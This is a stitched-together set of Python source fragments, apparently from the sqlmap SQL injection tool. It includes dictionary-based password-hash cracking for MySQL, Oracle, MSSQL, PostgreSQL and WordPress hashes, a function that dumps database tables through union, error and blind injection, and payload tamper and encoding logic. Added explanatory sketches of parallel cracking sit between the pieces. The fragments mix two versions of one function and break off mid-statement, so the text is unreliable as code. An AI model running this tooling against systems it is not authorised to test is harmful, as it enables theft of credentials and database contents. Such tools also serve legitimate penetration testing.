def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found, proc_id, proc_count, wordlists, custom_wordlist): if IS_WIN: coloramainit() count = 0 rotator = 0 wordlist = Wordlist(wordlists, proc_id, getattr(proc_count, "value", 0), custom_wordlist) try: for word in wordlist: if found.value: break current = __functions__[hash_regex](password=word, uppercase=False, **kwargs) count += 1 if not isinstance(word, basestring): continue if suffix: word = word + suffix try: if hash_ == current: if hash_regex == HASH.ORACLE_OLD: # only for cosmetic purposes word = word.upper() retVal.put((user, hash_, word)) clearConsoleLine() infoMsg = "\r[%s] [INFO] cracked password '%s'" % (time.strftime("%X"), word) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user '%s'\n" % user else: infoMsg += " for hash '%s'\n" % hash_ dataToStdout(infoMsg, True) found.value = True elif (proc_id == 0 or getattr(proc_count, "value", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0: rotator += 1 if rotator >= len(ROTATING_CHARS): rotator = 0 status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) if not user.startswith(DUMMY_USER_PREFIX): status += ' (user: %s)' % user if not hasattr(conf, "api"): dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) except KeyboardInterrupt: raise except (UnicodeEncodeError, UnicodeDecodeError): pass # ignore possible encoding problems caused by some words in custom dictionaries except Exception, e: warnMsg = "there was a problem while hashing entry: %s (%s). " % (repr(word), e) warnMsg += "Please report by e-mail to %s" % ML logger.critical(warnMsg) except KeyboardInterrupt: pass finally: if hasattr(proc_count, "value"): with proc_count.get_lock(): proc_count.value -= 1
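A minimal sketch of the coordination used by _bruteProcessVariantB() above, with hash_func and the word slicing as generic stand-ins for sqlmap's hash functions and Wordlist slicing: a shared multiprocessing Value lets any worker stop its siblings as soon as the hash is cracked, and the cracked word travels back over a Queue.

import multiprocessing

def crack_worker(target_hash, words, hash_func, found, results):
    for word in words:
        if found.value:                      # another process already found it
            break
        if hash_func(word) == target_hash:
            results.put(word)
            found.value = True
            break

def crack(target_hash, wordlist, hash_func, processes=4):
    found = multiprocessing.Value('i', 0)
    results = multiprocessing.Queue()
    workers = [multiprocessing.Process(target=crack_worker,
                                       args=(target_hash, wordlist[i::processes], hash_func, found, results))
               for i in range(processes)]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
    return results.get() if not results.empty() else None

Each process receives a disjoint slice of the wordlist (wordlist[i::processes]); on platforms that spawn rather than fork, hash_func must be a module-level, picklable function.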
def dictionaryAttack(attack_dict): suffix_list = [""] hash_regexes = [] results = [] for (_, hashes) in attack_dict.items(): for hash_ in hashes: if not hash_: continue hash_ = hash_.split()[0] regex = hashRecognition(hash_) if regex and regex not in hash_regexes: hash_regexes.append(regex) infoMsg = "using hash method: '%s'" % __functions__[regex].func_name logger.info(infoMsg) for hash_regex in hash_regexes: attack_info = [] for (user, hashes) in attack_dict.items(): for hash_ in hashes: if not hash_: continue hash_ = hash_.split()[0] if getCompiledRegex(hash_regex).match(hash_): hash_ = hash_.lower() if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC): attack_info.append([(user, hash_), {}]) elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES): attack_info.append([(user, hash_), {'username': user}]) elif hash_regex in (HASH.ORACLE): attack_info.append([(user, hash_), {'salt': hash_[-20:]}]) elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD): attack_info.append([(user, hash_), {'salt': hash_[6:14]}]) elif hash_regex in (HASH.CRYPT_GENERIC): attack_info.append([(user, hash_), {'salt': hash_[0:2]}]) if not attack_info: continue if not kb.wordlist: if hash_regex == HASH.ORACLE_OLD: #it's the slowest of all methods hence smaller default dict message = "what's the dictionary's location? [%s]" % paths.ORACLE_DEFAULT_PASSWD dictpath = readInput(message, default=paths.ORACLE_DEFAULT_PASSWD) else: message = "what's the dictionary's location? [%s]" % paths.WORDLIST dictpath = readInput(message, default=paths.WORDLIST) checkFile(dictpath) infoMsg = "loading dictionary from: '%s'" % dictpath logger.info(infoMsg) kb.wordlist = getFileItems(dictpath, None, False) message = "do you want to use common password suffixes? (slow!) [y/N] " test = readInput(message, default="N") if test[0] in ("y", "Y"): suffix_list += COMMON_PASSWORD_SUFFIXES infoMsg = "starting dictionary attack (%s)" % __functions__[hash_regex].func_name logger.info(infoMsg) for item in attack_info: ((user, _), _) = item kb.wordlist.append(normalizeUnicode(user)) length = len(kb.wordlist) * len(suffix_list) if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC): count = 0 for suffix in suffix_list: if not attack_info: break for word in kb.wordlist: if not attack_info: break count += 1 if suffix: word = word + suffix try: current = __functions__[hash_regex](password = word, uppercase = False) for item in attack_info: ((user, hash_), _) = item if hash_ == current: results.append((user, hash_, word)) clearConsoleLine() infoMsg = "[%s] [INFO] found: '%s'" % (time.strftime("%X"), word) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user: '******'\n" % user else: infoMsg += " for hash: '%s'\n" % hash_ dataToStdout(infoMsg, True) attack_info.remove(item) elif count % HASH_MOD_ITEM_DISPLAY == 0 or count == length or hash_regex in (HASH.ORACLE_OLD) or hash_regex == HASH.CRYPT_GENERIC and IS_WIN: status = '%d/%d words (%d%s)' % (count, length, round(100.0*count/length), '%') dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) except KeyboardInterrupt: print warnMsg = "user aborted during dictionary attack phase" logger.warn(warnMsg) return results except: warnMsg = "there was a problem while hashing entry: %s. " % repr(word) warnMsg += "Please report by e-mail to %s." 
% ML logger.critical(warnMsg) clearConsoleLine() else: for ((user, hash_), kwargs) in attack_info: count = 0 found = False for suffix in suffix_list: if found: break for word in kb.wordlist: current = __functions__[hash_regex](password = word, uppercase = False, **kwargs) count += 1 if suffix: word = word + suffix try: if hash_ == current: if regex == HASH.ORACLE_OLD: #only for cosmetic purposes word = word.upper() results.append((user, hash_, word)) clearConsoleLine() infoMsg = "[%s] [INFO] found: '%s'" % (time.strftime("%X"), word) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user: '%s'\n" % user else: infoMsg += " for hash: '%s'\n" % hash_ dataToStdout(infoMsg, True) found = True break elif count % HASH_MOD_ITEM_DISPLAY == 0 or count == length or hash_regex in (HASH.ORACLE_OLD) or hash_regex == HASH.CRYPT_GENERIC and IS_WIN: status = '%d/%d words (%d%s)' % (count, length, round(100.0*count/length), '%') if not user.startswith(DUMMY_USER_PREFIX): status += ' (user: %s)' % user dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) except KeyboardInterrupt: print warnMsg = "user aborted during dictionary attack phase" logger.warn(warnMsg) return results except: warnMsg = "there was a problem while hashing entry: %s. " % repr(word) warnMsg += "Please report by e-mail to %s." % ML logger.critical(warnMsg) clearConsoleLine() if len(hash_regexes) == 0: warnMsg = "unknown hash format. " warnMsg += "Please report by e-mail to %s." % ML logger.warn(warnMsg) if len(results) == 0: warnMsg = "no clear password(s) found" logger.warn(warnMsg) return results
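A compact sketch of the unsalted branch above (MySQL/MD5/SHA1-style hashes), where a single hash computation per candidate word can be tested against every outstanding target at once; hash_func and the suffix handling are illustrative stand-ins.

def attack_unsalted(target_hashes, wordlist, hash_func, suffixes=("",)):
    # target_hashes: dict mapping hash -> user; returns dict mapping hash -> cracked word
    outstanding = dict(target_hashes)
    cracked = {}
    for suffix in suffixes:
        if not outstanding:
            break
        for word in wordlist:
            candidate = hash_func(word + suffix)
            if candidate in outstanding:
                cracked[candidate] = word + suffix
                del outstanding[candidate]
                if not outstanding:
                    break
    return cracked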
def dictionaryAttack(attack_dict): suffix_list = [""] custom_wordlist = [] hash_regexes = [] results = [] resumes = [] processException = False user_hash = [] for (_, hashes) in attack_dict.items(): for hash_ in hashes: if not hash_: continue hash_ = hash_.split()[0] regex = hashRecognition(hash_) if regex and regex not in hash_regexes: hash_regexes.append(regex) infoMsg = "using hash method '%s'" % __functions__[regex].func_name logger.info(infoMsg) for hash_regex in hash_regexes: keys = set() attack_info = [] for (user, hashes) in attack_dict.items(): for hash_ in hashes: if not hash_: continue hash_ = hash_.split()[0] if re.match(hash_regex, hash_): item = None if hash_regex not in (HASH.CRYPT_GENERIC, HASH.WORDPRESS): hash_ = hash_.lower() if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC): item = [(user, hash_), {}] elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES): item = [(user, hash_), {'username': user}] elif hash_regex in (HASH.ORACLE): item = [(user, hash_), {'salt': hash_[-20:]}] elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD): item = [(user, hash_), {'salt': hash_[6:14]}] elif hash_regex in (HASH.CRYPT_GENERIC): item = [(user, hash_), {'salt': hash_[0:2]}] elif hash_regex in (HASH.WORDPRESS): item = [(user, hash_), {'salt': hash_[4:12], 'count': 1<<ITOA64.index(hash_[3]), 'prefix': hash_[:12]}] if item and hash_ not in keys: resumed = hashDBRetrieve(hash_) if not resumed: attack_info.append(item) user_hash.append(item[0]) else: infoMsg = "resuming password '%s' for hash '%s'" % (resumed, hash_) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user '%s'" % user logger.info(infoMsg) resumes.append((user, hash_, resumed)) keys.add(hash_) if not attack_info: continue if not kb.wordlists: while not kb.wordlists: # the slowest of all methods hence smaller default dict if hash_regex in (HASH.ORACLE_OLD, HASH.WORDPRESS): dictPaths = [paths.SMALL_DICT] else: dictPaths = [paths.WORDLIST] message = "what dictionary do you want to use?\n" message += "[1] default dictionary file '%s' (press Enter)\n" % dictPaths[0] message += "[2] custom dictionary file\n" message += "[3] file with list of dictionary files" choice = readInput(message, default="1") try: if choice == "2": message = "what's the custom dictionary's location?\n" dictPaths = [readInput(message)] logger.info("using custom dictionary") elif choice == "3": message = "what's the list file location?\n" listPath = readInput(message) checkFile(listPath) dictPaths = getFileItems(listPath) logger.info("using custom list of dictionaries") else: logger.info("using default dictionary") for dictPath in dictPaths: checkFile(dictPath) kb.wordlists = dictPaths except SqlmapFilePathException, msg: warnMsg = "there was a problem while loading dictionaries" warnMsg += " ('%s')" % msg logger.critical(warnMsg) message = "do you want to use common password suffixes? (slow!) 
[y/N] " test = readInput(message, default="N") if test[0] in ("y", "Y"): suffix_list += COMMON_PASSWORD_SUFFIXES infoMsg = "starting dictionary-based cracking (%s)" % __functions__[hash_regex].func_name logger.info(infoMsg) for item in attack_info: ((user, _), _) = item if user and not user.startswith(DUMMY_USER_PREFIX): custom_wordlist.append(normalizeUnicode(user)) if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC): for suffix in suffix_list: if not attack_info or processException: break if suffix: clearConsoleLine() infoMsg = "using suffix '%s'" % suffix logger.info(infoMsg) retVal = None processes = [] try: if _multiprocessing: if _multiprocessing.cpu_count() > 1: infoMsg = "starting %d processes " % _multiprocessing.cpu_count() singleTimeLogMessage(infoMsg) retVal = _multiprocessing.Queue() count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) for i in xrange(_multiprocessing.cpu_count()): p = _multiprocessing.Process(target=_bruteProcessVariantA, args=(attack_info, hash_regex, suffix, retVal, i, count, kb.wordlists, custom_wordlist)) processes.append(p) for p in processes: p.start() for p in processes: p.join() else: warnMsg = "multiprocessing hash cracking is currently " warnMsg += "not supported on this platform" singleTimeWarnMessage(warnMsg) retVal = Queue() _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, 0, 1, kb.wordlists, custom_wordlist) except KeyboardInterrupt: print processException = True warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)" logger.warn(warnMsg) for process in processes: try: process.terminate() process.join() except OSError: pass finally: if retVal: conf.hashDB.beginTransaction() while not retVal.empty(): user, hash_, word = item = retVal.get(block=False) attack_info = filter(lambda _: _[0][0] != user or _[0][1] != hash_, attack_info) hashDBWrite(hash_, word) results.append(item) conf.hashDB.endTransaction() clearConsoleLine() else: for ((user, hash_), kwargs) in attack_info: if processException: break if any(_[0] == user and _[1] == hash_ for _ in results): continue count = 0 found = False for suffix in suffix_list: if found or processException: break if suffix: clearConsoleLine() infoMsg = "using suffix '%s'" % suffix logger.info(infoMsg) retVal = None processes = [] try: if _multiprocessing: if _multiprocessing.cpu_count() > 1: infoMsg = "starting %d processes " % _multiprocessing.cpu_count() singleTimeLogMessage(infoMsg) retVal = _multiprocessing.Queue() found_ = _multiprocessing.Value('i', False) count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) for i in xrange(_multiprocessing.cpu_count()): p = _multiprocessing.Process(target=_bruteProcessVariantB, args=(user, hash_, kwargs, hash_regex, suffix, retVal, found_, i, count, kb.wordlists, custom_wordlist)) processes.append(p) for p in processes: p.start() for p in processes: p.join() found = found_.value != 0 else: warnMsg = "multiprocessing hash cracking is currently " warnMsg += "not supported on this platform" singleTimeWarnMessage(warnMsg) class Value(): pass retVal = Queue() found_ = Value() found_.value = False _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found_, 0, 1, kb.wordlists, custom_wordlist) found = found_.value except KeyboardInterrupt: print processException = True warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)" logger.warn(warnMsg) for process in processes: try: process.terminate() process.join() except OSError: pass 
finally: if retVal: conf.hashDB.beginTransaction() while not retVal.empty(): user, hash_, word = item = retVal.get(block=False) hashDBWrite(hash_, word) results.append(item) conf.hashDB.endTransaction() clearConsoleLine()
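A hedged sketch of the bookkeeping in the finally: blocks above, assuming a generic store_password(hash_, word) callback in place of hashDBWrite(): whatever the worker processes managed to push onto the queue is drained into the results list, even when the run was interrupted, so partially completed cracks survive and can be resumed later.

def drain_results(queue, results, store_password):
    while not queue.empty():
        user, hash_, word = item = queue.get(block=False)
        store_password(hash_, word)      # persist so the crack can be resumed on the next run
        results.append(item)
    return results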
path, os.path.join(root, ifile), msg) logger.error(errMsg) else: # Run doc tests # Reference: http://docs.python.org/library/doctest.html (failure_count, test_count) = doctest.testmod(module) if failure_count > 0: retVal = False count += 1 status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length)) dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) clearConsoleLine() if retVal: logger.info("smoke test final result: PASSED") else: logger.error("smoke test final result: FAILED") return retVal def adjustValueType(tagName, value): for family in optDict.keys(): for name, type_ in optDict[family].items(): if type(type_) == tuple: type_ = type_[0] if tagName == name: if type_ == "boolean":
def dumpTable(self, foundData=None): self.forceDbmsEnum() if conf.db is None or conf.db == CURRENT_DB: if conf.db is None: warnMsg = "missing database parameter. sqlmap is going " warnMsg += "to use the current database to enumerate " warnMsg += "table(s) entries" logger.warn(warnMsg) conf.db = self.getCurrentDb() elif conf.db is not None: if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): conf.db = conf.db.upper() if ',' in conf.db: errMsg = "only one database name is allowed when enumerating " errMsg += "the tables' columns" raise SqlmapMissingMandatoryOptionException(errMsg) conf.db = safeSQLIdentificatorNaming(conf.db) if conf.tbl: if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): conf.tbl = conf.tbl.upper() tblList = conf.tbl.split(",") else: self.getTables() if len(kb.data.cachedTables) > 0: tblList = kb.data.cachedTables.values() if isinstance(tblList[0], (set, tuple, list)): tblList = tblList[0] elif not conf.search: errMsg = "unable to retrieve the tables " errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) raise SqlmapNoneDataException(errMsg) else: return for tbl in tblList: tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) for tbl in tblList: conf.tbl = tbl kb.data.dumpedTable = {} if foundData is None: kb.data.cachedColumns = {} self.getColumns(onlyColNames=True, dumpMode=True) else: kb.data.cachedColumns = foundData try: kb.dumpTable = "%s.%s" % (conf.db, tbl) if not safeSQLIdentificatorNaming(conf.db) in kb.data.cachedColumns \ or safeSQLIdentificatorNaming(tbl, True) not in \ kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] \ or not kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]: warnMsg = "unable to enumerate the columns for table " warnMsg += "'%s' in database" % unsafeSQLIdentificatorNaming(tbl) warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(conf.db) warnMsg += ", skipping" if len(tblList) > 1 else "" logger.warn(warnMsg) continue columns = kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] colList = sorted(filter(None, columns.keys())) if conf.excludeCol: colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] if not colList: warnMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl) warnMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) warnMsg += " (no usable column names)" logger.warn(warnMsg) continue colNames = colString = ", ".join(column for column in colList) rootQuery = queries[Backend.getIdentifiedDbms()].dump_table infoMsg = "fetching entries" if conf.col: infoMsg += " of column(s) '%s'" % colNames infoMsg += " for table '%s'" % unsafeSQLIdentificatorNaming(tbl) infoMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) logger.info(infoMsg) for column in colList: _ = agent.preprocessField(tbl, column) if _ != column: colString = re.sub(r"\b%s\b" % re.escape(column), _, colString) entriesCount = 0 if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: entries = [] query = None if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = rootQuery.inband.query % (colString, tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper()))) elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MAXDB): query = rootQuery.inband.query % (colString, tbl) elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, 
DBMS.MSSQL): # Partial inband and error if not (isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL): table = "%s.%s" % (conf.db, tbl) retVal = pivotDumpTable(table, colList, blind=False) if retVal: entries, _ = retVal entries = zip(*[entries[colName] for colName in colList]) else: query = rootQuery.inband.query % (colString, conf.db, tbl) elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): query = rootQuery.inband.query % (colString, conf.db, tbl, prioritySortColumns(colList)[0]) else: query = rootQuery.inband.query % (colString, conf.db, tbl) query = whereQuery(query) if not entries and query: entries = inject.getValue(query, blind=False, time=False, dump=True) if not isNoneValue(entries): if isinstance(entries, basestring): entries = [entries] elif not isListLike(entries): entries = [] entriesCount = len(entries) for index, column in enumerate(colList): if column not in kb.data.dumpedTable: kb.data.dumpedTable[column] = {"length": len(column), "values": BigArray()} for entry in entries: if entry is None or len(entry) == 0: continue if isinstance(entry, basestring): colEntry = entry else: colEntry = unArrayizeValue(entry[index]) if index < len(entry) else u'' _ = len(DUMP_REPLACEMENTS.get(getUnicode(colEntry), getUnicode(colEntry))) maxLen = max(len(column), _) if maxLen > kb.data.dumpedTable[column]["length"]: kb.data.dumpedTable[column]["length"] = maxLen kb.data.dumpedTable[column]["values"].append(colEntry) if not kb.data.dumpedTable and isInferenceAvailable() and not conf.direct: infoMsg = "fetching number of " if conf.col: infoMsg += "column(s) '%s' " % colNames infoMsg += "entries for table '%s' " % unsafeSQLIdentificatorNaming(tbl) infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) logger.info(infoMsg) if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = rootQuery.blind.count % (tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper()))) elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): query = rootQuery.blind.count % tbl elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL): query = rootQuery.blind.count % ("%s.%s" % (conf.db, tbl)) elif Backend.isDbms(DBMS.MAXDB): query = rootQuery.blind.count % tbl else: query = rootQuery.blind.count % (conf.db, tbl) query = whereQuery(query) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) lengths = {} entries = {} if count == 0: warnMsg = "table '%s' " % unsafeSQLIdentificatorNaming(tbl) warnMsg += "in database '%s' " % unsafeSQLIdentificatorNaming(conf.db) warnMsg += "appears to be empty" logger.warn(warnMsg) for column in colList: lengths[column] = len(column) entries[column] = [] elif not isNumPosStrValue(count): warnMsg = "unable to retrieve the number of " if conf.col: warnMsg += "column(s) '%s' " % colNames warnMsg += "entries for table '%s' " % unsafeSQLIdentificatorNaming(tbl) warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) logger.warn(warnMsg) continue elif Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.SYBASE, DBMS.MAXDB, DBMS.MSSQL): if Backend.isDbms(DBMS.ACCESS): table = tbl elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL): table = "%s.%s" % (conf.db, tbl) elif Backend.isDbms(DBMS.MAXDB): table = "%s.%s" % (conf.db, tbl) retVal = pivotDumpTable(table, colList, count, blind=True) if retVal: entries, lengths = retVal else: emptyColumns = [] plusOne = 
Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) indexRange = getLimitRange(count, plusOne=plusOne) if len(colList) < len(indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD: for column in colList: if inject.getValue("SELECT COUNT(%s) FROM %s" % (column, kb.dumpTable), union=False, error=False) == '0': emptyColumns.append(column) debugMsg = "column '%s' of table '%s' will not be " % (column, kb.dumpTable) debugMsg += "dumped as it appears to be empty" logger.debug(debugMsg) try: for index in indexRange: for column in colList: value = "" if column not in lengths: lengths[column] = 0 if column not in entries: entries[column] = BigArray() if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index) elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), index) elif Backend.isDbms(DBMS.SQLITE): query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl, index) elif Backend.isDbms(DBMS.FIREBIRD): query = rootQuery.blind.query % (index, agent.preprocessField(tbl, column), tbl) query = whereQuery(query) value = NULL if column in emptyColumns else inject.getValue(query, union=False, error=False, dump=True) value = '' if value is None else value _ = DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value)) lengths[column] = max(lengths[column], len(_)) entries[column].append(value) except KeyboardInterrupt: clearConsoleLine() warnMsg = "Ctrl+C detected in dumping phase" logger.warn(warnMsg) for column, columnEntries in entries.items(): length = max(lengths[column], len(column)) kb.data.dumpedTable[column] = {"length": length, "values": columnEntries} entriesCount = len(columnEntries) if len(kb.data.dumpedTable) == 0 or (entriesCount == 0 and kb.permissionFlag): warnMsg = "unable to retrieve the entries " if conf.col: warnMsg += "of columns '%s' " % colNames warnMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) warnMsg += "in database '%s'%s" % (unsafeSQLIdentificatorNaming(conf.db), " (permission denied)" if kb.permissionFlag else "") logger.warn(warnMsg) else: kb.data.dumpedTable["__infos__"] = {"count": entriesCount, "table": safeSQLIdentificatorNaming(tbl, True), "db": safeSQLIdentificatorNaming(conf.db)} try: attackDumpedTable() except (IOError, OSError), ex: errMsg = "an error occurred while attacking " errMsg += "table dump ('%s')" % getSafeExString(ex) logger.critical(errMsg) conf.dumper.dbTableValues(kb.data.dumpedTable) except SqlmapConnectionException, ex: errMsg = "connection exception detected in dumping phase " errMsg += "('%s')" % getSafeExString(ex) logger.critical(errMsg) finally:
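An illustrative reduction of the structure dumpTable() accumulates above: per column, a running maximum display width plus the list of values, which the dumper later uses to render fixed-width output. The names are simplified stand-ins for kb.data.dumpedTable, not sqlmap's internals.

def build_dump(columns, rows):
    dumped = dict((column, {"length": len(column), "values": []}) for column in columns)
    for row in rows:
        for index, column in enumerate(columns):
            value = "" if row[index] is None else str(row[index])
            dumped[column]["values"].append(value)
            dumped[column]["length"] = max(dumped[column]["length"], len(value))
    return dumped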
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True): """ This method calls a function to get the target url page content and returns its page MD5 hash or a boolean value in case of string match check ('--string' command line parameter) """ if conf.direct: return direct(value, content) get = None post = None cookie = None ua = None referer = None host = None page = None pageLength = None uri = None code = None skipUrlEncode = conf.skipUrlEncode if not place: place = kb.injection.place or PLACE.GET raise404 = place != PLACE.URI if raise404 is None else raise404 value = agent.adjustLateValues(value) payload = agent.extractPayload(value) threadData = getCurrentThreadData() if skipUrlEncode is None and conf.httpHeaders: headers = dict(conf.httpHeaders) _ = max(headers[_] if _.upper() == HTTPHEADER.CONTENT_TYPE.upper() else None for _ in headers.keys()) if _ and "urlencoded" not in _: skipUrlEncode = True if payload: if kb.tamperFunctions: for function in kb.tamperFunctions: payload = function(payload=payload, headers=auxHeaders) if not isinstance(payload, basestring): errMsg = "tamper function '%s' returns " % function.func_name errMsg += "invalid payload type ('%s')" % type(payload) raise sqlmapValueException, errMsg value = agent.replacePayload(value, payload) logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload)) if place == PLACE.CUSTOM_POST: if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML): # payloads in SOAP/XML should have chars > and < replaced # with their HTML encoded counterparts payload = payload.replace('>', ">").replace('<', "<") elif kb.postHint == POST_HINT.JSON: if payload.startswith('"') and payload.endswith('"'): payload = json.dumps(payload[1:-1]) else: payload = json.dumps(payload)[1:-1] value = agent.replacePayload(value, payload) else: if place != PLACE.URI or (value and payload and '?' 
in value and value.find('?') < value.find(payload)): # GET, URI and Cookie need to be throughly URL encoded (POST is encoded down below) payload = urlencode(payload, '%', False, True) if place in (PLACE.GET, PLACE.COOKIE, PLACE.URI) and not skipUrlEncode else payload value = agent.replacePayload(value, payload) if place: value = agent.removePayloadDelimiters(value) if conf.checkPayload: checkPayload(value) if PLACE.GET in conf.parameters: get = conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value if PLACE.POST in conf.parameters: post = conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value if PLACE.CUSTOM_POST in conf.parameters: post = conf.parameters[PLACE.CUSTOM_POST].replace(CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value if PLACE.COOKIE in conf.parameters: cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value if PLACE.USER_AGENT in conf.parameters: ua = conf.parameters[PLACE.USER_AGENT] if place != PLACE.USER_AGENT or not value else value if PLACE.REFERER in conf.parameters: referer = conf.parameters[PLACE.REFERER] if place != PLACE.REFERER or not value else value if PLACE.HOST in conf.parameters: host = conf.parameters[PLACE.HOST] if place != PLACE.HOST or not value else value if PLACE.URI in conf.parameters: uri = conf.url if place != PLACE.URI or not value else value else: uri = conf.url if conf.rParam: def _randomizeParameter(paramString, randomParameter): retVal = paramString match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString) if match: origValue = match.group("value") retVal = re.sub("%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString) return retVal for randomParameter in conf.rParam: for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE): if item in conf.parameters: if item == PLACE.GET and get: get = _randomizeParameter(get, randomParameter) elif item == PLACE.POST and post: post = _randomizeParameter(post, randomParameter) elif item == PLACE.COOKIE and cookie: cookie = _randomizeParameter(cookie, randomParameter) if conf.evalCode: delimiter = conf.pDel or "&" variables = {} originals = {} for item in filter(None, (get, post)): for part in item.split(delimiter): if '=' in part: name, value = part.split('=', 1) evaluateCode("%s=%s" % (name, repr(value)), variables) originals.update(variables) evaluateCode(conf.evalCode, variables) for name, value in variables.items(): if name != "__builtins__" and originals.get(name, "") != value: if isinstance(value, (basestring, int)): value = unicode(value) if '%s=' % name in (get or ""): get = re.sub("((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, get) elif '%s=' % name in (post or ""): post = re.sub("((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, post) elif post is not None: post += "%s%s=%s" % (delimiter, name, value) else: get += "%s%s=%s" % (delimiter, name, value) if not skipUrlEncode: get = urlencode(get, limit=True) if post is not None: if place not in (PLACE.POST, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE): post = getattr(post, UNENCODED_ORIGINAL_VALUE) elif not skipUrlEncode and kb.postHint not in POST_HINT_CONTENT_TYPES.keys(): post = urlencode(post) if timeBasedCompare: if len(kb.responseTimes) < MIN_TIME_RESPONSES: clearConsoleLine() if conf.tor: warnMsg = "it's highly recommended to avoid usage of switch '--tor' for " warnMsg += "time-based injections because of its high latency time" 
